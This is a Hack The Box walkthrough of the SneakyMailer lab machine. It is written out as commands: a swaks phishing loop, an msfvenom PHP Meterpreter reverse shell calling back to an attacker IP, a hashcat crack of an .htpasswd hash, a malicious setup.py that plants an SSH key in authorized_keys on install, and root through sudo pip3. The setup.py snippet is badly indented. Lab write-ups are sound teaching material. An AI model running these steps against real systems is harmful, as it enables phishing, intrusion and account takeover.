8. Hack The Box. Level Medium: SneakyMailer Walkthrough. Phishing, LPE via PyPI and GTFOBins pip3

11 December 2024 5 minutes Author: Lady Liberty

This article provides a detailed walkthrough of the SneakyMailer challenge on Hack The Box. You will learn how to obtain a list of email addresses, send a phishing email, deploy a PHP shell via FTP, execute arbitrary code using PyPI, and escalate privileges via GTFOBins pip3.

SneakyMailer walkthrough guide

The article demonstrates the process of obtaining a list of email addresses, executing a phishing email campaign, deploying a PHP shell via FTP, executing arbitrary code using PyPI, and escalating privileges via GTFOBins pip3.

Recon

This machine has an IP address of 10.10.10.197, which I add to /etc/hosts.

10.10.10.197 	sneakymailer.htb

First, a scan for open ports is performed.

#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -A $1

The scan revealed a large number of open ports, some of which are responsible for mail services, ports 80 and 8080 belong to the web server, as well as active FTP and SSH services, access to which requires credentials. The web server, as can be seen from the scan, redirects to another domain. For further work, we add this domain to the /etc/hosts file.
10.10.10.197    sneakycorp.htb

On the website you can find a list of employees and their corresponding emails.

To get all email addresses we use email extractor.

Now we open port 80 and multicast phishing emails using the swaks tool.

while read mail; do swaks --to $mail --from [email protected] --header 'Subject: News' --body 'Look it: http://10.10.14.114/' --server sneakymailer.htb | grep 'To:' ; done < emails.txt

And we see that some user clicks on our link.

Let’s decode the data.

We get a password with which we can log in to the mail server.

Entry point

We use Evolution as a client.

We enter the password when connecting and see two letters.

One of the emails revealed the password for a developer account (suitable for FTP access) and a mention of PyPI associated with the user low.

After logging into FTP and receiving some files, we notice that these are the source codes of the site.

Let’s add the dev subdomain to /etc/hosts.

10.10.10.197    dev.sneakycorp.htb

The data obtained allows us to place a PHP shell on the server. For this, we use a payload. In this case, Meterpreter was chosen as the payload.

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.14.114 LPORT=4321 -f raw > r.php
cat r.php | xclip -selection clipboard && echo '<?php ' | tr -d '\n' > r.php && xclip -selection clipboard -o >> r.php

After placing the file in the dev directory, let’s run the listoner.

handler -p php/meterpreter_reverse_tcp -H 10.10.14.114 -P 4321

After accessing our file, we get an active session.

USER

After inspecting the web server environment, we discover the pypi subdomain, which was already mentioned in the context of this lab, and find the .htpasswd file.
hashcat --example | grep '$apr1' -A2 -B2

hashcat -m 1600 -a 0 pypi.hash ./tools/rockyou.txt

We will also add the found subdomain to /etc/hosts.

10.10.10.197    pypi.sneakycorp.htb

Installing your own package allows you to execute arbitrary code. Here is a good tutorial on creating a python package. First, let’s create a directory.

Now you need to create the following files: init.py, .pypirc, README.md, setup.cfg, and setup.py. The setup.py file will contain the executable code. Example code for the setup.py file that writes the SSH key to the user low.

from setuptools import setup 
try: 
       f = open('/home/low/.ssh/authorized_keys', 'a') 
f.write('ssh-rsa ... ') 
       f.close() 
except: 
       setup( 
   name='ralfpack', 
   packages=['ralfpack'], 
   description='R', 
   version='0.1', 
   url='http://pypi.sneakymailer.htb:8080/ralfpack', 
   author='ralf', 
   author_email='[email protected]', 
   keywords=['pip','ralfpack','example'] )

We create __init__.py (so that it exists), an empty README.md and setup.cfg (we specify README.md in it).

And all that’s left is to create a .pypirc file. We specify the package name and configuration for it.

We upload all files to the host.

Let’s get a normal shell and assemble our package.

python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 setup.py sdist

Now let’s download it.

python3 setup.py sdist upload -r ralfpack

The key has been successfully uploaded, and you can now connect to SSH using the private key to access the low user account.

ROOT

Analysis of sudo settings revealed that the pip3 command can be executed with root privileges. This opens up the possibility of privilege escalation through the exploitation of pip3 functionality.

We turn to GTFOBins and see instructions for obtaining a shell.

We repeat and get a shell on behalf of root.

Conclusion

This article describes the completion of the SneakyMailer task on Hack The Box using modern cybersecurity techniques. We demonstrate how, through network port analysis, phishing mailing, PHP shell deployment, and working with PyPI, you can gain access to accounts and elevate privileges. The final stage is to use the sudo capabilities to run pip3 with administrator rights, which opens the way to full control over the system. The article is useful for understanding the practical aspects of information security.

Other related articles
Found an error?
If you find an error, take a screenshot and send it to the bot.